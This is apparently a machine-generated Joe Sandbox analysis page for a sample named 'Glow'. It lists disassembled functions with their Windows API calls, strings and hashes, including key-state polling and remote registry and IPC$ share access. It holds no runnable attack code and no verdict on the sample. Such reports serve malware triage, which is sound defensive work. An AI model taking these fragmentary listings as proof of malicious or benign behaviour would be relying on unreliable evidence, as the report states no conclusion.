Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: dfae506e0f0345405da0cfe02a3a5b0e68fb73958b780944fdd97987af608b81
Instruction ID: 64e40cc1eba5d8e8391a20ef1cdd45cf49ec766d52d04ef9c1f117fd68ec5a90
Opcode Fuzzy Hash: dfae506e0f0345405da0cfe02a3a5b0e68fb73958b780944fdd97987af608b81
Instruction Fuzzy Hash: B651F760904BE929EB37D7A28950BEABFB54F02340F094799D5C21A1C3DB64AB4CC763

Function 003E662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 003E6649
GetWindowRect.USER32(00000000,?), ref: 003E6662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 003E66C0
GetDlgItem.USER32(?,00000002), ref: 003E66D0
GetWindowRect.USER32(00000000,?), ref: 003E66E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 003E6736
GetDlgItem.USER32(?,000003E9), ref: 003E6744
GetWindowRect.USER32(00000000,?), ref: 003E6756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 003E6798
GetDlgItem.USER32(?,000003EA), ref: 003E67AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003E67C1
InvalidateRect.USER32(?,00000000,00000001), ref: 003E67CE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 9a6873a55e18f6d900385ee7108d01d20f6e7e5a69bf6b9deea67507dcd138ba
Instruction ID: 55e2ec5869777be27e3d1e8060cbeec5f9480818ed6730af9360f5d9843c6a21
Opcode Fuzzy Hash: 9a6873a55e18f6d900385ee7108d01d20f6e7e5a69bf6b9deea67507dcd138ba
Instruction Fuzzy Hash: B3512FB1E00215AFDB18CF69CD86AAEBBB5FB58354F118229F915E62D0D7709D048B50

Function 00382128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242

GetSysColor.USER32(0000000F), ref: 00382152

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f04f144ab70d42428c23d8b25e13883f38e052db2be04b359ec1afecf7cff92f
Instruction ID: 8cc5397cd65d9492a7478a0f4c02d7c9a68aaa826c39304a10576baadc5dee04
Opcode Fuzzy Hash: f04f144ab70d42428c23d8b25e13883f38e052db2be04b359ec1afecf7cff92f
Instruction Fuzzy Hash: DD41D871500750AFDB226F38DC88FBA7779AB46330F258299FAA2872E1C7318D42D711

Function 003813A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 003C28D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003C28EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003C28FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003C2912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003C2933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003811F5,00000000,00000000,00000000,000000FF,00000000), ref: 003C2942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003C295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003811F5,00000000,00000000,00000000,000000FF,00000000), ref: 003C296E

Strings

(E, xrefs: 003C2885

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (E
API String ID: 1268354404-3218771753
Opcode ID: 4f051145b27814b3ae6a815299097f609815dfba94473ffbad34344c2ad928b3
Instruction ID: cd7aa90fe8d6e0bdaa6df818de2a6b6d59617f1e41a7b2771483db76e5007d08
Opcode Fuzzy Hash: 4f051145b27814b3ae6a815299097f609815dfba94473ffbad34344c2ad928b3
Instruction Fuzzy Hash: 15516970A00305AFDB26EF26CC45FAA7BB9FB48710F108529F946976A0D7B0EC91DB54

Function 0041955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

Part of subcall function 003819CD: GetCursorPos.USER32(?), ref: 003819E1
Part of subcall function 003819CD: ScreenToClient.USER32(00000000,?), ref: 003819FE
Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000001), ref: 00381A23
Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000002), ref: 00381A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 004195C7
ImageList_EndDrag.COMCTL32 ref: 004195CD
ReleaseCapture.USER32 ref: 004195D3
SetWindowTextW.USER32(?,00000000), ref: 0041966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00419681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0041975B

Strings

(E, xrefs: 0041956D
(E, xrefs: 00419728
@GUI_DROPID, xrefs: 004196AD
@GUI_DRAGFILE, xrefs: 004196F6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$(E$(E
API String ID: 1924731296-3253568702
Opcode ID: e4617ca28e7489db685bed5b166843237304d5cff91957f7534cb085c383b275
Instruction ID: dc0f13a37a6955af25889cfc2d1c9ff6b5a2c05fd193555b3110ed449e0cdffa
Opcode Fuzzy Hash: e4617ca28e7489db685bed5b166843237304d5cff91957f7534cb085c383b275
Instruction Fuzzy Hash: 93518C70604300AFD704EF20CC56BAA77E5FB88715F500A2EF9969B2E2DB749948CB56

Function 003EA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,003D0D31,00000001,0000138C,00000001,00000000,00000001,?,003FEEAE,00452430), ref: 003EA091
LoadStringW.USER32(00000000,?,003D0D31,00000001), ref: 003EA09A

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,003D0D31,00000001,0000138C,00000001,00000000,00000001,?,003FEEAE,00452430,?), ref: 003EA0BC
LoadStringW.USER32(00000000,?,003D0D31,00000001), ref: 003EA0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003EA1E0

Strings

Line %d (File "%s"):, xrefs: 003EA109
%s (%d) : ==> %s: %s %s, xrefs: 003EA1C4
Error: , xrefs: 003EA197
^ ERROR, xrefs: 003EA175
Line %d:, xrefs: 003EA11A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 189899aeb2f0b7fe2848f10cb6a1eadb1a652a2f9f82e4a74d5dfb59e110b0e2
Instruction ID: a59ba6f29e2d7c0e3ee114f9f94051d5c2e5fd97c6b45f7d3ae91309a6a18ab7
Opcode Fuzzy Hash: 189899aeb2f0b7fe2848f10cb6a1eadb1a652a2f9f82e4a74d5dfb59e110b0e2
Instruction Fuzzy Hash: 93416372800619ABCF06FBE1DD46EEEB778AF14340F5041A5F501BA092DB756F49CB61

Function 003E0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003E1093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003E10AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003E10CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003E10F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 003E111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003E1128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003E112D

Strings

SOFTWARE\Classes\, xrefs: 003E0FFF
\IPC$, xrefs: 003E1075
\CLSID, xrefs: 003E1015

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 1da5abdbeceb0938ed1741daa656c2c0c2278bd14319f8f102ac42c91a388fd4
Instruction ID: 371900110166932e82386c93658ed30d99342d1aa07a13d5c3ba899040113c91
Opcode Fuzzy Hash: 1da5abdbeceb0938ed1741daa656c2c0c2278bd14319f8f102ac42c91a388fd4
Instruction Fuzzy Hash: 39411BB2C10229ABCF12EFA4DC45DEEB7B8FF08740F418169E901A71A1EB719E04CB50

Function 00414A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00414AD9
CreateCompatibleDC.GDI32(00000000), ref: 00414AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00414AF3
SelectObject.GDI32(00000000,00000000), ref: 00414AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00414B06
DeleteDC.GDI32(00000000), ref: 00414B10
GetWindowLongW.USER32(?,000000EC), ref: 00414B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00414B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00414B3C

Strings

static, xrefs: 00414A71

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 020c1191c132fba36fd183457f36a54fb3f0bfd82534d546b7785ca8b5e1227a
Instruction ID: 82585020ab5557714e43567baded1637c4655970d785c653cb8bfb5c41d8a84c
Opcode Fuzzy Hash: 020c1191c132fba36fd183457f36a54fb3f0bfd82534d546b7785ca8b5e1227a
Instruction Fuzzy Hash: D2319071500219BBDF119FA4CC08FDB3BA9FF0D364F114226FA19A61A0C739D850DB98

Function 0040468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004046B9
CoInitialize.OLE32(00000000), ref: 004046E7
CoUninitialize.OLE32 ref: 004046F1
_wcslen.LIBCMT ref: 0040478A
GetRunningObjectTable.OLE32(00000000,?), ref: 0040480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00404932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0040496B
CoGetObject.OLE32(?,00000000,00420B64,?), ref: 0040498A
SetErrorMode.KERNEL32(00000000), ref: 0040499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404A21
VariantClear.OLEAUT32(?), ref: 00404A35

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 7ad6efcf5a24d23e86c8abedd5009b7c44f1fdd93c32810f394d2a2d90118b43
Instruction ID: dc6efe95fd35d7a46e3fc9d895577c84011496826de010603e6b4d371c294a63
Opcode Fuzzy Hash: 7ad6efcf5a24d23e86c8abedd5009b7c44f1fdd93c32810f394d2a2d90118b43
Instruction Fuzzy Hash: 4DC126B16043059FC700EF68C88496BB7E9FF89748F10496EFA89AB290D735ED05CB56

Function 003F84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003F8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003F85D4
SHGetDesktopFolder.SHELL32(?), ref: 003F85E8
CoCreateInstance.OLE32(00420CD4,00000000,00000001,00447E8C,?), ref: 003F8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003F86B9
CoTaskMemFree.OLE32(?,?), ref: 003F8711
SHBrowseForFolderW.SHELL32(?), ref: 003F879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003F87BF
CoTaskMemFree.OLE32(00000000), ref: 003F87C6
CoTaskMemFree.OLE32(00000000), ref: 003F881B
CoUninitialize.OLE32 ref: 003F8821

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: bfd3bbd696833ba5467fc4a727ae65bb5ce27c466a8dccf9a19427c1240c6575
Instruction ID: 005d5c8e405fc3cd4bb7d75e722be1839c4a15fd8f2743e53546764a3689828e
Opcode Fuzzy Hash: bfd3bbd696833ba5467fc4a727ae65bb5ce27c466a8dccf9a19427c1240c6575
Instruction Fuzzy Hash: 2BC12B75A00209EFCB15DFA4C888DAEBBF9FF48344B1584A9E519DB261DB30ED45CB90

Function 003E0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003E039F
SafeArrayAllocData.OLEAUT32(?), ref: 003E03F8
VariantInit.OLEAUT32(?), ref: 003E040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 003E042A
VariantCopy.OLEAUT32(?,?), ref: 003E047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 003E0491
VariantClear.OLEAUT32(?), ref: 003E04A6
SafeArrayDestroyData.OLEAUT32(?), ref: 003E04B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E04BC
VariantClear.OLEAUT32(?), ref: 003E04CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E04D9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9b651fcf30690094c4a023ab7c61d367e99bef84b0f3851f2796e63d47e59afd
Instruction ID: ab14af4be428f94a7b81f64b95b06e1bbf28e8d750e1f9ce46829709802cee16
Opcode Fuzzy Hash: 9b651fcf30690094c4a023ab7c61d367e99bef84b0f3851f2796e63d47e59afd
Instruction Fuzzy Hash: 8B419375E00229DFCF05DFA5D8449EEBBB9FF08344F018169E915AB2A1C774A985CFA0

Function 003EA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 003EA65D
GetAsyncKeyState.USER32(000000A0), ref: 003EA6DE
GetKeyState.USER32(000000A0), ref: 003EA6F9
GetAsyncKeyState.USER32(000000A1), ref: 003EA713
GetKeyState.USER32(000000A1), ref: 003EA728
GetAsyncKeyState.USER32(00000011), ref: 003EA740
GetKeyState.USER32(00000011), ref: 003EA752
GetAsyncKeyState.USER32(00000012), ref: 003EA76A
GetKeyState.USER32(00000012), ref: 003EA77C
GetAsyncKeyState.USER32(0000005B), ref: 003EA794
GetKeyState.USER32(0000005B), ref: 003EA7A6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f9cf8443a2c5b7cd0c7e4434f42243c8427f6838f13fdf0e26a371ba4316bc72
Instruction ID: 2929481b0715458952ee3a456a9e60711562714b5a796e8a7bbdda7247208669
Opcode Fuzzy Hash: f9cf8443a2c5b7cd0c7e4434f42243c8427f6838f13fdf0e26a371ba4316bc72
Instruction Fuzzy Hash: 4641C864504FE96DFF32D6A184043E5BEF16F12344F0A8259D5C64A6C2EBA4BDC8C753

Function 00409730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00409750

Part of subcall function 003E9805: _wcslen.LIBCMT ref: 003E9828

_wcslen.LIBCMT ref: 004097AB
_wcslen.LIBCMT ref: 004097F9
_wcslen.LIBCMT ref: 00409839
_wcslen.LIBCMT ref: 004098CB

Strings

cdecl, xrefs: 004097A5, 004097AA
none, xrefs: 004098C2, 004098C7
winapi, xrefs: 004097F3, 004097F8
stdcall, xrefs: 00409833, 00409838

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 2883f5ce3d483057ba9080f640ed1327430f2582cedf2db98880009a2c2a442c
Instruction ID: 9101c69673174e466ef81ad5db7d1ebd2ff5a5936b8ee275547492a00c824b31
Opcode Fuzzy Hash: 2883f5ce3d483057ba9080f640ed1327430f2582cedf2db98880009a2c2a442c
Instruction Fuzzy Hash: 3C51E572A10116ABCB14EF68C9509BEB3A1BF55360720823BE826FB3C2D739DD41C794

Function 00404189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 004041D1
CoUninitialize.OLE32 ref: 004041DC
CoCreateInstance.OLE32(?,00000000,00000017,00420B44,?), ref: 00404236
IIDFromString.OLE32(?,?), ref: 004042A9
VariantInit.OLEAUT32(?), ref: 00404341
VariantClear.OLEAUT32(?), ref: 00404393

Strings

Invalid parameter, xrefs: 004042C2
NULL Pointer assignment, xrefs: 0040427B
Failed to create object, xrefs: 00404241, 004042F7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 7901c105fc4defa039120ec0b66c52de45e66f320250377ad48382d10e284170
Instruction ID: 5ac4595bd7803a3a4e99a648ba71b3b3050a3d1261872724e866f5dc9cef4d8c
Opcode Fuzzy Hash: 7901c105fc4defa039120ec0b66c52de45e66f320250377ad48382d10e284170
Instruction Fuzzy Hash: 5261BFB07083019FD311DF64D888B6BB7E4AF89754F00096EFA81AB291C774ED45CB9A

Function 003F8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003F8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 003F8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003F8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003F8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 003F8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 003F8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003F8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 003F8DDA

Strings

*.*, xrefs: 003F8DE0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
